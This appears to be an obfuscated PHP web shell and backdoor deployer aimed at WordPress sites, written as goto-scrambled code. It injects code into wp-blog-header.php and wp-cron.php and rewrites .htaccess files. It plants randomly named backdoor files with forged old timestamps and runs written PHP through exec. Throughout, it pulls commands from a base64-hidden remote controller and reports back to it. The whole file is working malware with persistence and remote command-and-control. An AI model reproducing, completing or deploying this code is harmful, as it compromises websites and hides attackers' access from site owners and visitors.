($all_results as $k => $v) { goto Be7; Be7: $index_url = $v . '/wp-blog-header.php'; goto cc4; cc4: $wp_url = $v . '/wp-cron.php'; goto Ccf; c01: if (file_exists($index_url)) { chmod($index_url, 0644); $index_yuan = file_get_contents($index_url); } goto f9e; a88: $count++; goto F2b; B8a: $wp_yuan = ""; goto D2c; A23: chmod($ht_url, 0444); goto a88; fb9: chmod($ht_url, 0644); goto Ab2; Ccf: $ht_url = $v . '/.htaccess'; goto c0d; D2c: if (file_exists($wp_url)) { chmod($wp_url, 0644); $wp_yuan = file_get_contents($wp_url); } goto Ae3; f9e: if (strpos($index_yuan, $station_code) === false) { file_put_contents($index_url, $station_code . $index_yuan); chmod($index_url, 0444); } goto B8a; c0d: $index_yuan = ""; goto c01; Ae3: if (strpos($wp_yuan, $station_code) === false) { file_put_contents($wp_url, $station_code . $wp_yuan); chmod($wp_yuan, 0444); } goto fb9; Ab2: file_put_contents($ht_url, $ht_content); goto A23; F2b: } goto cd6; Aaa: foreach ($all_folders as $k => $v) { if (!strpos($v, $folder_name)) { $all_results[] = $v; } } goto d54; d96: $all_folders = getParentsFolders($path); goto Beb; d97: } goto F08; e90: function execAction($data, $pweb, $now_site) { goto Ac8; A1c: $result_data['shell_id'] = $shell_id; goto E7c; A37: $shell_id = $data['shell_id']; goto fb4; c19: $json_array = json_decode($cc, true); goto c58; c58: if (isset($json_array['in_contnt']) && !empty($json_array['ht_contnt']) && !empty($json_array['exec_code'])) { $result = add_exec($json_array['ht_contnt'], $json_array['in_contnt'], $json_array['exec_code'], $json_array['wp_ycode']); if ($result) { $result_data['status'] = 1; } else { $result_data['code'] = '1001'; $result_data['status'] = 2; } } else { $result_data['code'] = '1002'; $result_data['status'] = 2; } goto d3c; cf4: $url = base64_decode($pweb) . '/indexdoor.php?action=exec&group_id=' . $group_id . '&shell_type=' . $shell_type; goto ad1; b38: $save_url = base64_decode($pweb) . '/save.php'; goto ded; Ac8: $group_id = $data['group_id']; goto A37; ded: $cc = curlget($url); goto c19; f59: $res = curlpost($save_url, $result_data); goto f11; f11: if ($res['status']) { echo '<p style="color:green;">Exec is successfully</p>'; } else { echo '<p style="color:red;">Exec is failed! ' . $result_data['code'] . '</p>'; } goto f6b; fb4: $shell_type = $data['shell_type']; goto cf4; E7c: $result_data['action'] = 'exec'; goto b38; ad1: $result_data = array(); goto A1c; d3c: $result_data['shell_type'] = $shell_type; goto f59; f6b: } goto b5a; be7: $can_read = false; goto e48; Bff: $file_path = $data['SCRIPT_FILENAME']; goto d7c; B9d: $post_data = $_POST; goto a95; C65: $last_folder_url = ""; goto Dc2; D27: $now_url = $web_url . $sy_path; goto B9d; e19: function rebackAction($data, $pweb, $now_site) { goto C0d; B41: $result_data = array(); goto b47; b46: $result_data['action'] = 'reback'; goto de9; ac1: $url = base64_decode($pweb) . '/indexdoor.php?action=reback&group_id=' . $group_id . '&shell_type=' . $shell_type; goto Ad7; b47: $result_data['shell_id'] = $shell_id; goto b46; d7e: if ($res['status']) { echo '<p style="color:green;">Reback is successfully</p>'; foreach ($wp_result as $k => $v) { echo '<p><a href="' . $v . '" target="_blank">' . $v . '</a></p>'; } } else { echo '<p style="color:red;">Reback is failed! ' . $result_data['code'] . '</p>'; } goto F7c; Ad7: $cc = curlget($url); goto dcb; cf5: $result_data['shell_type'] = $shell_type; goto ef4; a5b: if (isset($json_array['in_files']) && !empty($json_array['in_files'])) { goto a8f; dc9: $wp_list = explode(';', $json_array['wp_files']); goto D32; c0f: foreach ($in_list as $k => $v) { goto B8b; C9f: $wp_code = str_replace('[##in_contnt_' . $k . '##]', $wpstr, $wp_code); goto b87; b87: $contnt = $json_array['code'] . $json_array['wp_ycode']; goto E0a; B8b: $wpstr = strslit($v); goto C9f; E0a: crefile($v, $contnt); goto d6c; d6c: } goto A63; D4f: foreach ($ht_list as $k => $v) { goto A3e; E3d: crefile($v, $contnt); goto C88; Ebe: $contnt = $json_array['ht_contnt']; goto E3d; A3e: $wpstr = strslit($v); goto E48; E48: $wp_code = str_replace('[##ht_contnt_' . $k . '##]', $wpstr, $wp_code); goto Ebe; C88: } goto dc9; bd9: $in_list = explode(';', $json_array['in_files']); goto c0f; A63: $ht_list = explode(';', $json_array['ht_files']); goto D4f; fe2: if (!empty($wp_result) && count($wp_result) > 0) { $result_data['wp_urls'] = $wp_result; $result_data['status'] = 1; } else { $result_data['code'] = '1001'; $result_data['status'] = 2; } goto b05; da3: foreach ($wp_list as $k => $v) { $f = crefile($v, $wp_code); if ($f) { $wp_result[] = $now_site . $v; } } goto fe2; D32: $wp_result = array(); goto da3; a8f: $wp_code = $json_array['wp_code']; goto bd9; b05: } else { $result_data['code'] = '1002'; $result_data['status'] = 2; } goto b04; ef4: $res = curlpost($save_url, $result_data); goto d7e; dcb: $json_array = json_decode($cc, true); goto B41; b04: $result_data['shell_url'] = $now_site; goto cf5; c31: $shell_type = $data['shell_type']; goto ac1; de9: $save_url = base64_decode($pweb) . '/save.php'; goto a5b; C0d: $group_id = $data['group_id']; goto af9; af9: $shell_id = $data['shell_id']; goto c31; F7c: } goto e90; dff: $path = $_REQUEST['path']; goto F65; Fdc: $website_path = $data['DOCUMENT_ROOT']; goto Bff; Be5: if (!empty($post_data)) { foreach ($post_data as $k => $v) { $_SESSION[$k] = $v; } } goto b5d; B13: function fill_full($file_urls, $sy_count) { goto abf; A8e: $file_list = array('css', 'images', 'img', 'js', 'themes', 'plugins', 'uploads', 'languages', 'includes', 'maint', 'network', 'met', 'user', 'IXR', 'ID3', 'fonts', 'block', 'blocks', 'php-compat', 'php', 'Text', 'widgets', 'SimplePie', 'random', 'style-engine', 'pomo', 'certificates', 'blockt'); goto Abb; Abb: for ($i = 0; $i < $sy_count; $i++) { $path_url = $path . '/' . $file_tou[rand(0, count($file_tou) - 1)]; for ($j = 0; $j < rand(3, 6); $j++) { $path_url = $path_url . '/' . $file_list[rand(0, count($file_list) - 1)]; } $file_url_result[] = $path_url; } goto F9f; F9f: return $file_url_result; goto F58; e71: foreach ($file_urls as $k => $v) { if (!empty(trim($v))) { $file_url_result[] = $v; } } goto cf3; cf3: $file_tou = array('wp-content', 'wp-admin', 'wp-includes'); goto A8e; abf: $path = realpath($_SERVER['DOCUMENT_ROOT']); goto f57; f57: $file_url_result = array(); goto e71; F58: } goto Ef3; b28: function cndoorfile($fipath, $file_name, $open_content, $contnt) { goto b4e; E3c: $fileurl = $fipath . '/' . $file_name; goto f70; b4e: if (!is_dir($fipath)) { mkdir($fipath, 0755, true); } goto E3c; f70: if (file_put_contents($fileurl, $contnt) !== false) { goto D14; D0e: if (file_put_contents($fipath . '/.htaccess', $ht_content_now) !== false) { chmod($fipath . '/.htaccess', 0555); } goto A8b; a8a: $ht_content_now = ""; goto F64; D14: $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); goto d7b; B91: chmod($fipath . '/.htaccess', 0755); goto D0e; A94: return true; goto Ab4; Cd4: chmod($fileurl, 0555); goto a8a; F64: $ht_content_now = str_replace('{#htcontent}', $file_name, $open_content); goto B91; d7b: touch($fipath, $time); goto Cd4; A8b: chmod($fipath, 0555); goto A94; Ab4: } else { return false; } goto B8f; B8f: } goto Dca; a95: $pws = "aHR0cHM6Ly9mcDIwMjQuYnlob3QudG9w"; goto Be5; b5d: $all_paths = array(); goto a3f; e17: $file_path_array = explode('/', $file_path); goto a7e; d7c: $now_path = dirname($file_path); goto f4e; A2e: function add_doors($doors_array, $doors_55_array, $wp_files, $third_file, $ban_content, $open_content, $shell_action_code, $now_site) { goto C5d; A58: $randomKeys = array_rand($door_lists, count($doors_array) + count($doors_55_array)); goto B83; d37: $succ_files = array(); goto f73; A61: $shell_other_url = ""; goto Dfe; Dfe: foreach ($randomKeys as $key) { goto A05; A05: $file_door_url = $door_lists[$key]; goto C72; a9a: if ($i >= count($doors_array)) { goto Ee7; e0f: $file_url = $file_door_url . '/' . $file_name; goto bda; Ee7: $file_door_url = $file_door_url . '/wp'; goto e0f; bda: $res = cndoorfile($file_door_url, $file_name, $open_content, $doors_55_array[$i - count($doors_array)]); goto d28; d28: } else { $file_url = $file_door_url . '/' . $file_name; $res = crdoorfile($file_url, $doors_array[$i]); } goto b9f; C72: $file_name = getrandstr(rand(5, 10)) . '.php'; goto a9a; b10: $i++; goto E93; b9f: if ($res) { $succ_files[] = $file_url; $door_files[] = str_replace($path, $now_site, $file_url); } else { } goto b10; E93: } goto A7b; f73: $i = 0; goto A61; eed: getAllDirectories($path, 1, $door_count); goto fa7; D69: return $result; goto d61; A7b: if (!empty($last_folder_url)) { goto F53; F53: $file_url = $last_folder_url . '/index.php'; goto E06; Fa9: if ($res) { $shell_other_url = str_replace($path, $now_site, $file_url); } goto df9; E06: $res = crdoorfile($file_url, base64_decode($shell_action_code)); goto Fa9; df9: } goto dfb; Bb5: $result['count'] = $count; goto D69; C5d: $result = array(); goto Cf3; dfb: $count = 0; goto E8a; Af7: $door_count = count($doors_array) + count($doors_55_array); goto eed; B83: $door_files = array(); goto d37; E8a: if (count($succ_files) > 0) { goto bcb; a58: $ht_folders = array(); goto d81; E95: $ht_urls[] = $path . '/' . $third_file; goto a58; b5e: $wp_files_array = explode(";", $wp_files); goto b18; b18: foreach ($wp_files_array as $k => $v) { $wp_files_array[$k] = $path . $v; } goto F9c; F42: foreach ($ht_urls as $k => $v) { $ht_folders[] = dirname($v); $ht_files[] = basename($v); } goto c44; bcb: $ht_urls = array(); goto b5e; c06: $ht_urls = array_merge($ht_urls, $wp_files_array); goto E95; F9c: $ht_urls = $succ_files; goto c06; c44: foreach ($all_paths as $k => $a) { goto edd; edd: $now_files = array(); goto Dfb; d6e: chmod($a . '/.htaccess', 0755); goto e51; C6c: $ht_content_now = ""; goto Cd1; Dfb: foreach ($ht_folders as $htk => $htv) { if ($a == $htv) { $now_files[] = $ht_files[$htk]; } } goto C6c; e51: if (file_put_contents($a . '/.htaccess', $ht_content_now) !== false) { $count++; chmod($a . '/.htaccess', 0555); } goto d11; Cd1: if (!empty($now_files)) { $ht_content_now = str_replace('{#htcontent}', implode('|', $now_files), $open_content); } else { $ht_content_now = $ban_content; } goto d6e; d11: } goto Bbc; d81: $ht_files = array(); goto F42; Bbc: } goto E28; fa7: if (count($door_lists) < $door_count) { $sy_count = count($doors_array) + count($doors_55_array) - count($door_lists); $door_lists = fill_full($door_lists, $sy_count); } goto A58; E28: $result['door_files'] = $door_files; goto d9d; Cf3: global $door_lists, $all_paths, $last_folder_url; goto c16; d9d: $result['shell_other_url'] = $shell_other_url; goto Bb5; c16: $path = $_SERVER['DOCUMENT_ROOT']; goto Af7; d61: } goto B13; d4c: $domain = $_SERVER['HTTP_HOST']; goto A0a; Ba1: function crdoorfile($fipath, $contnt) { if (file_put_contents($fipath, $contnt) !== false) { goto A7d; af1: return true; goto f9a; A7d: $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); goto bfa; bfa: touch($fipath, $time); goto af1; f9a: } else { return false; } } goto b28; e97: function deleteFile($file) { if (file_exists($file)) { chmod($file, 0777); if (unlink($file)) { echo '<p style="color:green;font-weight: bold;">' . $file . " is delete success" . '</p>'; } else { echo '<p style="color:red;font-weight: bold;">' . $file . " is delete error" . '</p>'; } } else { echo '<p style="color:red;font-weight: bold;">' . $file . " is not exist" . '</p>'; } } goto Eef; C5c: function add_others($group2_code, $group3_code, $second_file, $third_file, $now_site) { goto A81; A81: $result = array(); goto E59; Eec: $result['third_url'] = ""; goto B39; B52: if ($tf) { $result['third_url'] = $now_site . '/' . $third_file; } goto Dd6; ef9: $tf = crefile($third_file, $group3_code); goto A79; B39: if ($sf) { $result['second_url'] = $now_site . '/' . $second_file; } goto B52; A79: $result['second_url'] = ""; goto Eec; E59: $sf = crefile($second_file, $group2_code); goto ef9; Dd6: return $result; goto c78; c78: } goto Adf; aa0: $prot = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://"; goto d4c; D68: $sy_path = str_replace($website_path, '', $now_path); goto D27; a7e: if (!is_dir($now_path)) { $now_path = dirname($now_path); } goto be7; F2c: function othersAction($data, $pweb, $now_site) { goto Aaf; Dfa: $url = base64_decode($pweb) . '/indexdoor.php?action=others&group_id_2=' . $group_id_2 . '&group_id_3=' . $group_id_3 . '&shell_type=' . $shell_type; goto D48; Aac: if ($res['status']) { echo '<p style="color:green;">Others is successfully</p>'; } else { echo '<p style="color:red;">Others is failed! ' . $result_data['code'] . '</p>'; } goto ab1; Bcb: $group_id_2 = $data['group_id_2']; goto bd1; Aaf: $shell_id = $data['shell_id']; goto Bcb; d02: $shell_type = $data['shell_type']; goto Dfa; C79: if (!empty($json_array['group2_code']) && !empty($json_array['second_file']) || !empty($json_array['group3_code']) && !empty($json_array['third_file'])) { $result = add_others($json_array['group2_code'], $json_array['group3_code'], $json_array['second_file'], $json_array['third_file'], $now_site); if (!empty($result['second_url']) || !empty($result['third_url'])) { goto e47; E77: $result_data['status'] = 1; goto ce3; e47: $result_data['second_url'] = $result['second_url']; goto A62; A62: $result_data['third_url'] = $result['third_url']; goto E77; ce3: } else { $result_data['code'] = '1001'; $result_data['status'] = 2; } } else { $result_data['code'] = '1002'; $result_data['status'] = 2; } goto c2c; D48: $result_data = array(); goto d83; f31: $cc = curlget($url); goto Fd3; bd1: $group_id_3 = $data['group_id_3']; goto d02; d83: $result_data['shell_id'] = $shell_id; goto Cb4; Fd3: $json_array = json_decode($cc, true); goto C79; Cb4: $result_data['action'] = 'others'; goto Dd5; c2c: $result_data['shell_type'] = $shell_type; goto E26; E26: $res = curlpost($save_url, $result_data); goto Aac; Dd5: $save_url = base64_decode($pweb) . '/save.php'; goto f31; ab1: } goto C5c; b5a: function add_exec($ht_contnt, $index_contnt, $exec_code, $wp_ycode) { goto c69; B4e: $l12 = array("1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m"); goto C90; b85: $exec_code = str_replace("[##indexcontent##]", base64_encode($index_contnt . $wp_ycode), $exec_code); goto B4e; Aae: exec("php -f" . __DIR__ . "/{$o15}.php > /dev/null 2>/dev/null &", $e18, $res); goto Abe; Abe: if ($res === 0) { return true; } else { return false; } goto A48; b96: fclose($u17); goto Aae; db9: $u17 = fopen($o15 . ".php", "w"); goto ec8; ec8: fwrite($u17, $exec_code); goto b96; C90: for ($i = 1; $i < rand(6, 6); $i++) { $e14 = rand(0, count($l12) - 1); $o15 .= $l12[$e14]; } goto db9; c69: $exec_code = str_replace("[##htcontent##]", base64_encode($ht_contnt), $exec_code); goto b85; A48: } goto F2c; A0a: $now_site = $prot . $domain; goto D68; Df1: function sortByFolder($now_path, $all_list) { goto d0e; bcf: sort($folder_list); goto Cd0; d0e: $folder_list = array(); goto ae5; A8f: return $all_list; goto B2a; dc5: $all_list = array_merge($folder_list, $file_list); goto A8f; ae5: $file_list = array(); goto F3e; Cd0: sort($file_list); goto dc5; F3e: foreach ($all_list as $k => $v) { if (is_dir($now_path . '/' . $v)) { $folder_list[] = $v; } else { $file_list[] = $v; } } goto bcf; B2a: } goto e19; Ca6: function curlpost($url, $data) { goto Ae1; e75: $response = curl_exec($ch); goto C3a; C3a: $result = array(); goto ca0; de7: curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); goto e75; e7e: $res = json_decode($response, true); goto Fb8; Cfa: curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json', 'Content-Length: ' . strlen($jsonData))); goto bae; Ae1: $jsonData = json_encode($data); goto c5b; Fb8: $result['status'] = $res['status']; goto F98; bae: curl_setopt($ch, CURLOPT_POST, true); goto de7; F6a: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto Fb3; D7a: curl_close($ch); goto e7e; Fb3: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto Cfa; ca0: if (curl_errno($ch)) { $result['status'] = 0; $result['msg'] = curl_error($ch); } goto D7a; c5b: $ch = curl_init($url); goto F6a; F98: return $result; goto Cd5; Cd5: } goto C14; e27: session_start(); goto C10; A20: function deleteDirectory($dir) { goto a56; C37: return rmdir($dir); goto Ed6; dcf: foreach ($files as $file) { if (is_file($file)) { unlink($file); } elseif (is_dir($file)) { deleteDirectory($file); } } goto C37; fc4: $files = glob($dir . '/*'); goto dcf; a56: if (!is_dir($dir)) { return false; } goto fc4; Ed6: } goto e97; Dca: function strslit($str) { $cha = str_split($str); return "'" . implode("'.'", $cha) . "'"; } goto cdc; De0: if (is_writable($now_path)) { $can_write = true; } goto aa0; b00: function getFileSize($file_url) { goto a89; a89: $file_size = filesize($file_url); goto d9f; d9f: if ($file_size > 1024 * 1024) { $file_size = round($file_size / (1024 * 1024), 2) . ' MB'; } else { if ($file_size > 1024) { $file_size = round($file_size / 1024, 2) . ' KB'; } else { $file_size = $file_size . ' B'; } } goto fe4; fe4: return $file_size; goto d0d; d0d: } goto dec; dec: function getFilePermission($filename) { goto F44; e55: $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-'); goto ae0; beb: $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-'); goto b42; C8d: $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-'); goto F1a; F44: clearstatcache(true, $filename); goto bf2; Dde: $info .= $perms & 0x100 ? 'r' : '-'; goto C46; F1a: $info .= $perms & 0x4 ? 'r' : '-'; goto C04; Adc: $info .= $perms & 0x10 ? 'w' : '-'; goto C8d; C46: $info .= $perms & 0x80 ? 'w' : '-'; goto beb; C04: $info .= $perms & 0x2 ? 'w' : '-'; goto e55; C94: if (($perms & 0xc000) === 0xc000) { $info = 's'; } elseif (($perms & 0xa000) === 0xa000) { $info = 'l'; } elseif (($perms & 0x8000) === 0x8000) { $info = '-'; } elseif (($perms & 0x6000) === 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) === 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) === 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) === 0x1000) { $info = 'p'; } else { $info = 'u'; } goto Dde; ae0: return $info; goto C7a; b42: $info .= $perms & 0x20 ? 'r' : '-'; goto Adc; bf2: $perms = fileperms($filename); goto C94; C7a: } goto Df1; D99: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto a84; Adf: function doorsAction($data, $pweb, $now_site) { goto C45; Fb0: $json_array = json_decode($cc, true); goto E92; C45: $result_data = array(); goto f41; f41: $result_data['shell_id'] = $data['shell_id']; goto F19; a12: $save_url = base64_decode($pweb) . '/save.php'; goto De3; E92: if (!empty($json_array['doors'])) { $result = add_doors($json_array['doors'], $json_array['doors_55'], $json_array['wp_files'], $json_array['third_file'], $json_array['ht_ban_content'], $json_array['ht_open_content'], $json_array['shell_action_code'], $now_site); if (!empty($result['door_files'])) { goto Cac; f3b: $result_data['shell_other_url'] = $result['shell_other_url']; goto A7e; Cac: $result_data['door_urls'] = implode(';', $result['door_files']); goto f3b; A7e: $result_data['status'] = 1; goto E25; E25: } else { $result_data['code'] = '1001'; $result_data['status'] = 2; } } else { $result_data['code'] = '1002'; $result_data['status'] = 2; } goto d7a; e89: if ($res['status']) { echo '<p style="color:green;">Doors is successfully, Success .h is ' . $result['count'] . '</p>'; foreach ($result['door_files'] as $k => $v) { echo '<p><a href="' . $v . '" target="_blank">' . $v . '</a></p>'; } } else { echo '<p style="color:red;">Doors is failed! ' . $result_data['code'] . '</p>'; } goto E04; ac5: $shell_type = $data['shell_type']; goto Fa8; d7a: $result_data['shell_type'] = $shell_type; goto B7a; E99: $group_id = $data['group_id']; goto ac5; F19: $result_data['action'] = 'doors'; goto a12; d43: $cc = curlget($url); goto Fb0; De3: $shell_id = $data['shell_id']; goto E99; B7a: $res = curlpost($save_url, $result_data); goto e89; Fa8: $url = base64_decode($pweb) . '/indexdoor.php?action=doors&shell_id=' . $shell_id . '&group_id=' . $group_id . '&shell_type=' . $shell_type; goto d43; E04: } goto A2e; Eef: function findFilesWithContent($directory, $searchString, $currentDepth = 0, $maxDepth = 10) { goto C2b; B21: if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if ($file != "." && $file != "..") { $filePath = $directory . '/' . $file; if (is_dir($filePath)) { $foundFiles = array_merge($foundFiles, findFilesWithContent($filePath, $searchString, $currentDepth + 1, $maxDepth)); } else { if (strpos(file_get_contents($filePath), $searchString) !== false) { $foundFiles[] = $filePath; } } } } closedir($handle); } goto Ce2; Ce2: return $foundFiles; goto db2; C2b: $foundFiles = []; goto B9c; B9c: if ($currentDepth >= $maxDepth) { return $foundFiles; } goto B21; db2: }